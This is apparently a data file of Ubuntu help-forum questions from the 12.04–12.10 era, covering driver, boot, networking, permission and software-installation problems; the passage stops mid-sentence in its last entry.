208138	nvidia display driver not working in text mode	i have the nvidia display driver from cuda 5.0 pre-release ( on a sony vaio ) installed with 12.04 . x works fine , but i if i press ctrl+alt+f1 the screen turns black and no login prompt appears . its definitely a graphic driver issue because the screen is completely black . not even a blinking text cursor . just black , i can switch back to x however . that 's fine . i 'd like to upgrade and install the nvidia display driver from the cuda 5.0 production release . but here comes the tricky part : the new display driver can only be installed with no x running . however , if i run init 1 ( to turn off x , networking , etc . ) the screen remains black . i have to reboot in this situation . now , if i change the default runlevel temporarily to 1 so that x does n't start , then i fear that the display driver can not display anything just like in the above cases . and this would be very bad since then i do n't know how to recover from this state . and actually it is very likely that i run into this because there was never a text output seen on my system when nvidia driver is active . what are my options ?
208139	causes of hanging ?	i never experienced any hanging on my old laptop , but on my new laptop ubuntu 12.04 hangs all the time . the screen freezes and all the indicator lights on my laptop stop blinking the only thing i can do is a cold reboot . my laptop is lenovo u310 , 64-bit with 30g ssd ( used only for intel rst under a windows 7 installation ) . i do n't quite remember how the raid stuff was configured when i installed my ubuntu , but i 'm sure my ubuntu does not use the ssd . i realize that the freezing is more likely to occur under slightly higher cpu load . ( like when i open a resource-consuming web page or so , but it does n't always occur ) what are the possible causes of freezing that i should look into ?
208143	is it possible to view per-process statistics on traffic usage ?	in bmon and vnstat i can see whole amount of received and sent traffic . but i ca n't see its origins ( processes that sent those requests ) . currently i see that during several last hours several gibs of traffic was received by my computer but i have no idea which process ( es ) invoked receiving of such amount of traffic . how can i debug it ?
208145	wubi installed ubuntu not showing up at boot menu after windows reinstallation	i recently installed 12.04 using wubi installer in a separate partition . because of some problem , i had to reinstall my windows . now the problem is that my windows has recovered , but ubuntu is not showing up at the boot menu , even though the ubuntu partition is intact .
208146	keep getting checked for errors message when logging in at command line	i am running 12.04 lts completely update . when logging in on the command line , i see this message *** /dev/sda1 will be checked for errors at next reboot *** i 've rebooted once and got the message upon logging in on the command line ; then used the sudo touch /forcefsdk command and rebooted ; and i still get this message . how can i clear the message , and does it really make a difference ? if it helps this system shutdown uncleanly due to a power failure , but has rebooted and acted fine since . cat /etc/fstab ics @ steamboy : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc defaults 0 0 # / was on /dev/sda1 during installation uuid=a15471c6-56f1-419f-89fa-73a5f3c7253e / ext4 errors=remount-ro 0 1 /dev/sdb1 /media/xtra ext3 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=a544f2c5-6e09-44ec-8130-a524a12a99c0 none swap sw 0 0 /dev/sdc0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 ics @ steamboy : ~ $ cat .bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto ' fi # some more ls aliases alias ll='ls -alf ' alias la='ls -a ' alias l='ls -cf' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi unset username export cvsroot= : ext : cvsuser @ revision_control : /home/cvsuser/src_tree export cvs_rsh=ssh export term=vt100 if [ `` `tty` '' ! = `` not a tty '' ] ; then stty clocal stty erase stty echoe fi export termcap=/etc/termcap.rhel3 export editor=vim export path=/usr/local/bin : /usr/bin : /usr/lib/python-django/bin : ~/.gem/ruby/1.9.1/bin : /home/amr/bin : $ path export pythonpath=/home/cnorton/bin : /home/amr/bin : $ pythonpath export python_egg_cache=/tmp/cnorton/.python-eggs export classpath=/usr/share/java : /home/cnorton/bin : $ classpath export vimclojure_server_jar= '' $ home/bin/server-2.3.0-20101203.173832-1.jar ''
208149	forwarding data between two interfaces	i installed ubuntu server 12.04 after that i installed dhcp3-server and configured it like this : at isc-dhcp-server interfaces= '' eth0 '' and in dhcpd.conf # a slightly different configuration for an internal subnet . subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.5 192.168.1.100 ; option domain-name-servers 192.168.1.1 ; option domain-name `` nazwa.local '' ; option routers 192.168.1.1 ; option broadcast-address 192.168.1.255 ; default-lease-time 600 ; max-lease-time 7200 ; } also i have two eth interfaces : # second netowrk interface auto eth0 iface eth0 inet static address 192.168.1.1 netmask 255.255.255.0 # the primary network interface auto eth1 iface eth1 inet dhcp when i plug computer to eth0 i get propertly ip adress but i ca n't visit any sites . i do even this : echo 1 > /proc/sys/net/ipv4/ip_forward
208152	installing windows 7 on system76	i 've seen the new all-in-one of system76 , but i 'm worried about a lot of enngineering software that is not compatible with linux , such as matlab , solidworks , autocad , autodesk inventor , altium designer and 3ds max . as well as the office stuff which i can not depend on any other office-packages in other ms office , especially for powerpoint , excel and access . i thought about installing windows alongside ubuntu , and using ubuntu for normal stuff while windows for engineering computing . however , i 'm afraid that windows may face some problem with fully compatibility with the device . does somebody have any idea about this issue ? ! will windows work fine just like any windows pc ? ! wo n't affect the work of ubuntu ?
208157	how to install gloobus preview on 12.10 ?	you look , i have installed the version 12.10 of the ubuntu and try to install the gloobus preview , but when i finished and started to use it , any file was opening with it . the files opened totally no view . what happened ? if i wonder because of the new version ?
208161	ca n't install extensions on site , gnome shell 3.6	ca n't install extensions . i just slide from `` off '' to `` on '' and nothing happens . using gnome shell 3.6 on ubuntu 12.10 while browsing on google chrome . tried to install on epiphany and firefox . same issue .
208165	ubuntu one message menu indicator appears whenever rhythmbox opened	despite un-ticking the ubuntu one plug-in within rhythmbox , every time i open rhythmbox the ubuntu one icon will appear in the message menu . is this a bug ? or am i missing a setting within rhythmbox ? running ubuntu 12.04.1 lts
208176	is it better to run linux distros live or installed on virtualbox ?	i want to run and install some applications on my linux distributions on the virtualbox . so what is better 'live ' versions or full installs on the virtualbox ? what is the difference between the two ( regarding features and required configurations ) ? i use , toshiba satellite p755-s5215 : ram : 5gb processor : intel i3 cpu : 2.10ghz graphics : sandybridge mobile os : 64bit
208178	vaio sb - turn off amd graphics card ?	i 've got a vaio sb with hybrid graphics ( intel graphics card and amd/ati radeon hd 6400m/7400m series ) . it is running in dual-boot with windows 7 and has the latest bios-update . for reason that the laptop overheats ( btw . 25-30w measured with powertop ) and the fan is permanently running , i tried to deactivate the amd , without success . i did : the vgaswitcheroo , which is usually recommended , but it definitely does n't work for me . i tried it in every variation i could encounter online ( aprox . 10 , especially other vaio s users , but they have mostly nvidia which can get turned off with other methods that do n't apply to me ) . at least the terminal tells me now that it is powered off , but i do n't perceive any difference in temperature or energy consumption 0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0 tried to get the catalyst running . does not work . laptop-mode-tools and other tools help a bit , but do n't make the big difference , as long as the amd is running ... same configuration , same problems , anyone ? thx ps . i am a linux beginner so i ca n't do everything and often do n't understand the processes behind , but even if it would possible to physically remove the amd i would do that . although i am not sure if laptop would still boot afterwards .
208181	merging chat history from windows to linux ( .db to .lock )	i want to merge my skype chat history from a windows version , which comes in a file called main.db inside my personal folders , with my main.lock file , found in my hidden skype folders on my home computer . i 'm running linux mint and ubuntu both on 32-bit 12.04 . alternatively , i may need to simply replace the current .lock file with a converted version of the older .db file . is there a way i can do this instead ?
208183	ca n't boot properly from usb	after i boot from my usb it starts to write a log , and freezes at some code that says something like novea drm if i remember correctly , the .iso works fine on a virtualpc . does anyone know what 's wrong ?
208193	failed to download repository information ?	i tried to update and im keep on getting this error , failed to download repository information and this is in details : w : failed to fetch http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
208207	poor battery life in ubuntu 12.10 on toshiba p755-s5215 , how can i manage background applications ?	i have a dual-booted laptop , where windows gives a good 3.5 hours on battery , while on ubuntu 12.10 my laptops runs only for 2 hours . i heard about powertop and laptop-tools , but after installing them i cant see the icons and the improvement in performance is little . does anyone have any advice ? also how can i see and close unwanted background applications ( when i use the command 'ps aux ' i see a hell lot of thing running down the terminal )
208215	how can i remove entries from the messaging menu in 12.10 ?	in previous ubuntu versions i could add a .desktop file in ~/.config/applications/indicators/messages/applications-blacklist and the items would no longer appear in the messaging menu . in 12.10 this no longer works . how can i remove unwanted entries ? thanks in advance !
208216	lenovo ideapad n581 with 12.10 does not connect to wlan	i just installed ubuntu 12.10 on my new laptop lenovo ideapad n581 mba84ge - ivy-bridge i3-2370m 8gb 500gb , but it does n't connect to wlan . in 12.04 it did n't connect too . what can i do ?
208217	change permission for all folders and files	i 've been around ubuntu for not too long now and i 'm getting tired of a thing i used to accept . when i installed apache and php on ubuntu it was done with root meaning it got permission . so i changed that to me . now i 've just copied a big number of files , ( php ) , to be viewed and edited in these directories . now my problem : i can not view the files from var/www/ because it requires , for some reason , everyone to have access to the files . not only me , or my group but everyone . no one else is using the computer but me , so i 'm cool with it . though i need a command to change all files permission recursively . when i 've browsed the questions already been answered i find for example chown -r viktor : viktor /var/www/ , or using sudo as well . this worked on the single var/www and the folders inside but not the files inside the folders and very odd i notice i ca n't do the same thing on example /var/www/dev/ .
208223	accessing ubuntu partition from windows 7	my question is this : is it possible to access my ubuntu partition from windows ? i can access windows with no problem from ubuntu ( 12.04 ) , yet when i try from windows , all i can see is the boot directory . i 've looked up this problem before , yet all i usually find is the opposite problem . my specs are : amd a8-4500m with radeon hd graphics 1.90ghz 6 gb ram 64-bit os 750 gb hdd , split directly down the middle , i.e , half for windows 7 and half for ubuntu 12.04 lts toshiba satellite l855d pske8c-00p001 thanks in advance for your help .
208224	how do i shutdown 12.10 when acpi is set to off ?	i recently installed 12.04 on an hp spectre xt ultrabook . i installed 12.04 from a usb . when the install was complete , and the computer restarted , i got a blank screen . after some searching , i found that i had to choose `` acpi=off '' during the installation , which now shows up in the grub screen . once i was on 12.04 , i upgraded to 12.10 . the issue now is that when i hit shutdown , the computer hangs on a purple shutdown screen . usually , at this point , i press the power button on the machine to completely power off the machine . i am new to ubuntu , and would appreciate the help . thanks .
208226	plymouth manager boot splash screen only during shutdown and not during restart	well i tried to customize the bootsplash screen from plymouth manager and somehow the selected bootsplash themes only shows up during shutdown but when restart and at the grub it shows a dark screen and not that bootsplash screen i selected . plz help regard
208236	set idle time in ubuntu 12.04 server	i recently installed ubuntu 12.04 server and am looking for away for get the server to suspend after an idle time . when using the desktop version i could use the gnome powersaving tool to specify the idle time . as i have no gui on the server is there a way to set the server idle time via the commandline/config file ? i will send the server a wake-on-lan packet to wake it up , if it is suspended and i need to use it .
208243	problem resuming after suspend in ubuntu 12.04	i 've installed ubuntu 12.04 on my macbook ( white ) . whenever the os goes into suspend after being idle for some time , it does not resume upon hitting a key or moving the mouse . i have to bring down the screen and open it again , to bring it out of suspend mode . furthermore , getting out of suspend mode is n't always guaranteed to use the above method . sometimes , the screen will stay blank in spite of closing and opening the screen multiple times . if this happens , i go to tty2 ( ctrl+alt+f2 ) , and do a sudo pkill -15 xorg . this gets rid of the blank screen but kills all my open applications . any ideas/help ?
208246	highly available iscsi target	i 'm in the process of setting up iscsi target on drbd following the steps detailed here . i would appreciate if someone can answer and explain the following queries : is there a way to set up just 1 resource for iscsi config and storage ? why does iscsi.config have to have a separate resource ( in drbd.conf ) . is it possible to put iscsi.config and iscsi.target in one disk ? if not possible , what would be a good ratio ( space wise ) for iscsi.config and iscsi.target ? assuming i need to set up a 1tb iscsi.storage , how much space should i allocate for iscsi.config ?
208248	segmentation fault in ubuntu one music	when clicking on the `` my downloads '' button in ubuntu one music the application crashes with a segmentation fault , showing the following terminal messages : ** message : console message : @ 0 : the page at https : //one.ubuntu.com/music/store/library displayed insecure content from http : //media.one.ubuntu.com/media/img/favicon.ico . errore di segmentazione ( core dump creato ) so i ca n't access my ubuntu one music downloads from inside rhythmbox .
208251	strange space in lubuntu desktop	as you can see on the image below , i have got a large space in the panel . in the preferences panel of the panel there is nothing here between the notification area and the battery control applet . how can i delete this ugly space ? thanks
208254	trouble resetting forgotten password in recovery mode , ubuntu 12.04	i beleive i have followed correct procedures to reset my password in recovery mode . however my new password is not accepted . i still can not access my os . it appears to have set a password for recovery mode , but not my main access .
208257	mysql does not start or work	recently i installed lamp with tasksel . then i remember i issued some commands to get into the mysql console - it worked . right now i checked - apache and php modules work perfectly . but as for mysql - whatever commands i issue - it does not start the console . it writes : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock' how can i fix it and start mysql ? why did this happen ? where is it installed ( i used the default location for the installation ) , because i dont understand what is started when i issue the commands ?
208259	how do i enable ssl in cherokee without libcherokee-mod-ssl ?	i am trying to enable https support in my cherokee webserver , but the option to enable it is missing from the `` general '' tab in the admin web interface . the back-end drop down only contains the `` no tls/ssl '' option . after a little searching , i found a few mentions of the libcherokee-mod-libssl package , which seems to be what i need to install . but it only exists in 10.04 , 11.10 and 12.04 , not 12.10 . trying a direct apt-get install gives the following : josh @ sirius : ~ $ sudo apt-get install libcherokee-mod-libssl [ sudo ] password for josh : reading package lists ... done building dependency tree reading state information ... done package libcherokee-mod-libssl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libcherokee-mod-libssl ' has no installation candidate
208260	after full installation from ubuntu 12.10.iso cd ca n't find d drive	i ca n't find my d : drive after installing ubuntu 12.10 from iso disc . is my d : drive formatted too ? as i understand it will just format the c : drive in an installation of ubuntu . are there any way to solve this ? can i find my drive , or is it lost ?
208261	is it really possible to run linux applications within windows using wubi ?	according to this article that i found , wubi `` has the side-effect of allowing you to run linux apps within a windows environment . '' i found this statement to be very intriguing : is it actually possible to run linux applications on windows ( without rebooting ) using wubi ? i know that there are other solutions ( such as colinux ) , but running linux applications in windows using wubi might be useful as well .
208264	why does ubuntu 12.10 only see 8 cores ?	in our lab we just bought a new machine with two 8-cores intel ( r ) xeon ( r ) cpu e5-2660 0 @ 2.20ghz processors which also support hyper-threading . i would expect ubuntu to see 32 processing units , however it only detects 8 of them ( the equivalent of just one processor with hyper-threading disabled ) . the bios correctly reports a total of 32 processing units . i am using the i386 version of ubuntu 12.10 desktop . any idea about how to solve this ?
208269	is there a way to get 2x3 workspaces in gnome 3.6	all the extensions and workarounds i can find do n't seem to work in gnome 3.6 . is there any way to get this to work in gnome 3.6 ?
208271	how do i force to disable desktop effect `` sheet '' ?	how do i force to disable desktop effect `` sheet '' ? i activated it and now my computer is too slow ... how can i remove it ? or via terminal ?
208276	can i hide a partition in nautilus for a specific user/group ?	i 'm trying to hide a partition form a specific group of users in ubuntu 12.04 . i have created a new rule in /etc/udev/rules.d/99-hide-disk.rules with kernel= '' sda3 '' , env { udisks_presentation_hide } = '' 1 '' and this works for all users . i tried kernel= '' sda3 '' , env { udisks_presentation_hide } = '' 1 '' , group= '' adm '' , mode : = '' 0700 but the partition is still hidden . that changes the group and permissions on the device rather than the rule . how do i make the rule only apply to a particular group of users ?
208281	how to force usb to use same device id instead of new one ?	i am having some trouble in automating the task . i am testing some android based mobiles in linux machine . the automation script uses the device id under /dev/bus/usb/001/ '' 053 '' it will be always under bus 001 only . but the dev will be random like if i insert one mobile then the dev id will be 053 , if remove and insert it again then the dev id will be 054 . the problem is , when some tests runs on the device and if device gets rebooted then new dev id is showing for the rebooted one and my scripts failing due to new dev id . is there any way to force usb devices to use same dev id instead of new one , so that there will be no issues to my tests even after device reboots ?
208283	openbox overhead is similar to that with gnome-panel	i just installed openbox via sudo apt-get install openbox . it already has obconf , btw . i noticed that when i logged into my openbox session instead of the one i usually use ( gnome-panel and not ubuntu 2d or one of the high overhead environments ) and checked via htop , i found that a similar amount of ram was being occupied ( ~600 mb or so ) with openbox or gnome-panel . what gives ? openbox looks lighter but it certainly is n't any different . obviously the same daemons etc would run in both environments as they share the same folders . is gnome-panel as good as openbox then ? edit : the comparison of memory used is quite similar and the gain is n't large by any means ( by using openbox ) htop output with gnome-panel htop output with openbox session
208284	how can i see if a contact has video/voice capability in empathy ?	i 'm using empathy for the first few weeks now on ubuntu 12.10 . i ca n't find any symbols indicating a contact has the ability to do a video chat or voice chat ... though i can see a `` mobile '' symbol which say `` online from a mobile or phone device '' . ps : i can see a video call , audio call option enables when i right click on a particular contact . i do n't see any option to configure anything like that . os : ubuntu 12.10 gnome 3.6.1 ( ppa ) empathy : 3.6.0.3
208286	efi - gpt dual-boot quantal amd64 - impossible boot windows 7	i tried to install ubuntu quantal am64 on a efi - gpt notebook ( asus x501u ) in dualboot . ubuntu works fine , but i ca n't boot windows anymore . hdd is partitioned in this way : sda1 0.2 gb boot efi sda2 0.128 gb sda3 60 gb windows sda4 210 gb data sda5 15 gb ubuntu sda6 4 gb swap sda7 25 gb recovery image booting pc , grub2 runs , but if i try to select `` windows 7 loader on sda3 '' i receive this message : '' error : invalid efi file path . '' if i select `` windows recovery environment on sda7 '' i receive : `` error : impossible find command `` drivemap '' - error : invalid efi file path . '' i installed dualboot ubuntu many times , but this is the first time on a efi - gpt system . this is the boot repair scan log : http : //paste.ubuntu.com/1320178/ i think easybcd ( win utility ) could have corrupted something , after used it i understood it was not compatible with efi gpt .
208287	`` software sources '' crashes since i upgraded from 12.04 to 12.10	i recently updated my pc from ubuntu 12.04 to 12.10 . now “software sources” crashes when i try to open it directly from unity or from ubuntu software center → software sources . when i try to open “update manager” , i get the following error message . note that the internet connection works ! w : failed to fetch http : //ppa.launchpad.net/rye/ubuntuone-extras/ubuntu/dists/quantal/main/source/sources 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . please , can somebody help me on this ? in addition , i get the following error when i use software-properties-gtk from the terminal : file `` /usr/lib/python3/dist-packages/apt/package.py '' , line 429 , in record return record ( self._records.record ) unicodedecodeerror : 'utf-8 ' codec ca n't decode byte 0xeb in position 114 : invalid continuation byte
208288	installing ubuntu on a corrupt dell mini with windows 7 without optical disk drive .	i have a dell mini 10 with a corrupt windows 7 os ( bootmgr missing ) . how can i install ubuntu as it does not have an optical disk drive ? can i install from an usb stick ?
208291	how to create a new blank file in nautilus 3.6 and above ?	i used to create new blank files in nautilus ( files ) using the right click context menu . it really saved me a lot of time . since nautilus 3.6 , there is no such entry . is there a way to create a new blank file in nautilus 3.6 and above ?
208295	screen scaling problem	i think this is what it 's called but i 'm not quite sure tbf , aha . yeah , so i updated packages last night like i do every night , and when i booted my computer this morning i had a problem whereby the display ran over the edge of the screen . this has been a problem for a while , but i rectified it by changing a setting on the nvidia program , however i think it has been updated to remove said feature as i ca n't find it anymore . i have no settings on my screen to adjust this either , so i 'm sorta stuck without the ~20px around the contour of my screen . it is a problem at all available resolutions . here 's a lil ' pic of my problem : edit : probably also worth mentioning the screen was originally detected as `` laptop '' in the display setting and had many resolutions to choose from , however now it 's displayed as `` oem '' and only has three . edit2 : after a very lengthy google search , i 'm yet to find a solution . the most promising solution i 've came across is the command xrandr -- output lvds -- mode 1920x1080 -- scale 1.25x1.25 , however it returns the error warning : output lvds not found ; ignoring . if there 's no solution , is there some sort of system rollback in ubuntu that i could use to restore the previous configuration ?
208297	boot computer to text mode using kernel parameters	referring to this question : how to remove the graphical user interface ? the answer of modifying /etc/default/grub to have grub_cmdline_linux_default= '' text '' would be great , but unfortunately i do n't have grub . can i achieve the same by modifying kernel boot parameters manually , like from u-boot ?
208302	how can i use hybrid sleep with kernel 3.6 ?	as i read in the changelog of kernel 3.6 there is support for hybrid sleep/suspend to both . i would like to know how to get it working in ubuntu 12.10 so that i can compare it with the two other suspend types .
208304	jerky mouse movements	as the title indicates i have some problem with delicate movement of the mouse in ubuntu fresh installation . the jerkiness is shown more at small and slow movements when the mouse will move a 2 millimeters to any random positions every 5 centimeters of movements . my mouse is a microsoft sidewinder gaming mouse . is there any driver i can use to fix it or any configuration ? this is happening both in unity or inside games and programs .
208309	ubuntu 12.10 and nvidia drivers do n't like each other ?	i decided to upgrade both my computers from precise to quantal . what a mistake that was . my laptop has a nvidia gt 330m card , while the desktop has an nvidia 9600 gt . in both cases everything goes great as long as i use the nouveau driver ( ugh ! ) . ca n't really play games ( amnesia ... and hoping for steam beta participation ... ) , even though it 's ok for work . now , ever since 9.04 or so , i just installed nvidia-current and all just worked . since 12.10 , after installing nvidia drivers , unity wo n't start at all ( hangs with only the wallpaper displayed , no cursor or widgets ) , gnome shell is permanently in fallback mode . now , i have tried on both computers , with multiple clean installs on ubuntu ( two separate downloads , just in case ) , one from ubuntu gnome remix . and additionally , fedora 17 , which seems to suffer from the same issue . tried all nvidia driver suggestions available in software sources , and even compiled the drivers myself . i tried several versions of the driver to exclude an issue with the newest one . in my frustration , i have switched to windows ( which , ironically , `` just works '' with my hardware ) , but still hold a twin os configuration on the desktop and would like to use ubuntu again . so , can anyone point me to where the issue might lie ?
208310	ctrl + a does n't work in browsers	the combination for select all ( ctrl+a ) does n't work in a browser ( either if we speak about firefox or chromium ) . it does n't work if i try to clik in to the adress bar nor if i try to use it to select what i 've written in google search bar at google.com . when i press ctrl + a it simply takes the cursor before the first letter . this does n't happen when i use a text editor software like libre office . there the shortcut does what 's supposed to do , selecting all the text . what could be the problem ?
208314	no wubildr , no spaceleft , boot error and a previous installation was detected in d : \ubuntu . please uninstall that before continuing	at first i was downloading ubuntu 12.10 using windows installer , but i cancelled it after just 2-3 minutes and downloaded 32-bit iso ( ubuntu-12.10-desktop-i386 ) . then i created bootable usb stick ( new hp 210 v210 w ) using pendrivelinux ( universal-usb-installer-1.9.1.4 ) . i formatted d drive . ( both by windows & easeus ) i 've set boot priority correctly . but after getting message '' boot error '' : i ran wubi.exe directly from usb drive . now the message is '' a previous installation was detected in d : \ubuntu . please uninstall that before continuing . '' i formatted d : again and performed disk check , surface test using easeus . it shows no error or bad sectors . formatted & checked my pendrive too . directly ran .iso . but same error keeps coming . i found way around above problems , by copying extracted .iso on d : \ and installing ubuntu using wubi.exe and though on boot it was shown with windows 7 , selecting it caused following error : try hd ( 0,0 ) : ntfs5 : no wubildr try hd ( 0,1 ) : ntfs5 : so , i uninstalled it and reinstalled it now installation fails at around 7mins saying an error occurred . no space left on device . for more info please see log file my d : is a 9 gb partition . ( 99 % free ) ubuntu site 12.10 says it needs around 4.5 gb . now trying it by extendin d : to 10 gb ... got no wubildr .
208318	how to 'chown ' on an ntfs ( or fat32 ) partition ?	i can not copy films from ntfs partition on my computer ( with ubuntu ) to ext2 hard drive installed in player `` dune '' . please help .
208319	can not boot ubuntu 12.04 , nvidia gt610 graphic problem	i´ve installed ubuntu 12.04 lts on my former windows xp pc and the installation process itself was successful . but every time i try to boot the system , it gets until the violet ubuntu boot screen , then freezes or says `` system is running in low graphics mode '' . i first tried the normal installation , then the newest driver for my nvidia gt610 card , version 304.60 , then reinstalled the whole system but it does not work.. how can i install an older version of the driver or isn´t the graphic card the problem ? ! i hope you can help me..
208324	6950 ati drivers in ubuntu 12.10 - which ones ?	i have the 64-bit version of ubuntu 12.10 and a radeon hd 6950 . which of these drivers am i supposed to install ? amd catalystâ˘ 12.10 proprietary linux x86 display driver or latest beta driver http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ? type=2.4.1 & product=2.4.1.3.42 & lang=english
208325	how to install vmware on 12.10 ?	before you say , yes i know this has been asked before . i have tried all the answers for older versions of ubuntu , but ca n't get it to work for 12.10 when installing vmware , it does n't let you do it all through ubuntu software centre , you get a .bundle file , and have to run that first to install the program , then once installed it says that it can not find something to do with the kernel like it has done in previous versions , i tried using the shell scripts for older versions to patch it , but it does n't work , and yes i did edit the file to work with vmware 5.0.0 but it still did n't work , i kept messing around with it until it did work.. but gave me a a black screen with loads of writing about my pc and vmware etc . not allowing me to do anything apart from moving the mouse.. i reinstalled the os , and want to make sure i install it correctly this time , someone please explain how i do it , thanks !
208329	why does gnome-terminal swallow some of my alt tmux shortcuts ?	i 've enabled a bunch of no-prefix shortcuts is tmux ( like alt-c for new window , alt-n for next ) , which has made my life so much better . the problem was , my shortcuts did n't always work . maybe every 5-10 presses , something would just swallow the keypress , and i 'd have to do it again . sometimes it would send input to the terminal , which was even worse . i worked this out for myself , but i wanted to post it as a question because i could n't find anything when i was searching . lots of people talk about the `` menu access key '' problem , but this is actually unrelated . edit : moved my answer out of the question .
208331	brightness control increments brightness by 4 instead of 1	the value of /sys/class/backlight/acpi_video0/brightness increments by four when the brightness controls are used , but i am able to force the value to anything in [ 0-10 ] . i have a hp envy 17-3200 . it may be more relevant to say , i 'm using an integrated intel graphics card . this problem persists in both unity and in gnome shell .
208332	how to integrate pidgin on ubuntu 12.10	i have just recently updated my system to ubuntu 12.10 and i can not integrate pidgin with the toolbars any more ! can any one give me a clue on how to do it ? thanks
208334	ca n't boot 12.10 after installing nvidia proprietary drivers	i was having issues with the 304 nvidia drivers , so i decided to downgrade to the 295 drivers . i did so by dropping out of x , stopping lightdm , and installing the drivers . however , now my computer wo n't boot into ubuntu at all . it hangs on stopping anac ( h ) cronistic cron and nothing happens . i have to manually shut it off . booting into failsafex mode does n't work either . i 'm writing this from a live usb because i ca n't figure out what else to do . any ideas ? is there a way to purge the nvidia files while booted into the live usb ?
208336	how to tweak indicator-session icon ?	which icon is indicator-session using ? i want to tweak it manually but i did n't manage to find it out under /usr/share/icons . is there a general way to find out which icon a certain application is using ?
208337	tcl : installing package starkit ?	( just wanted to document this ; self-answer to follow ) i just found visual regexp : a graphical explorer for your regexps , which is a tck/tk application , so i wanted to try it on ubuntu 11.04 natty . first i tried that 3.0 version : $ wget http : //laurent.riesterer.free.fr/regexp/visual_regexp-3.0.tar.gz $ tar xzvf visual_regexp-3.0.tar.gz $ cd visual_regexp-3.0/ $ ./visual_regexp.tcl ./visual_regexp.tcl : 48 : syntax error : word unexpected ( expecting `` ) '' ) $ bash visual_regexp.tcl visual_regexp.tcl : line 48 : syntax error near unexpected token `platform' visual_regexp.tcl : line 48 : `if { $ tcl_platform ( platform ) == `` windows '' } { ' $ sh visual_regexp.tcl visual_regexp.tcl : 48 : syntax error : word unexpected ( expecting `` ) '' ) $ tclsh visual_regexp.tcl 0 invalid command name `` toplevel '' while executing '' toplevel .history '' ( procedure `` regexp : :history : init '' line 5 ) invoked from within '' regexp : :history : init '' ( file `` visual_regexp.tcl '' line 1080 ) $ wish visual_regexp.tcl # finally works $ readlink -f $ ( which wish ) /usr/bin/wish8.4 $ wish8.5 visual_regexp.tcl # works too , better fonts $ cd .. ok , so now i want to try the 3.1 version : $ wget http : //laurent.riesterer.free.fr/regexp/visual_regexp-3.1.tcl $ wish8.4 visual_regexp-3.1.tcl error in startup script : ca n't find package starkit while executing '' package require starkit '' ( file `` visual_regexp-3.1.tcl '' line 1 ) $ tclsh visual_regexp-3.1.tcl ca n't find package starkit while executing '' package require starkit '' ( file `` visual_regexp-3.1.tcl '' line 1 ) looking for this error , the most relevant hits i can find are : build your first starkit step 1 : get tclkit and sdx [ ... ] if this command responds with the error `` ca n't find package starkit '' then you need to add read permissions to your tclkit binary . on unix/linux type systems , this would be via : chmod u+r 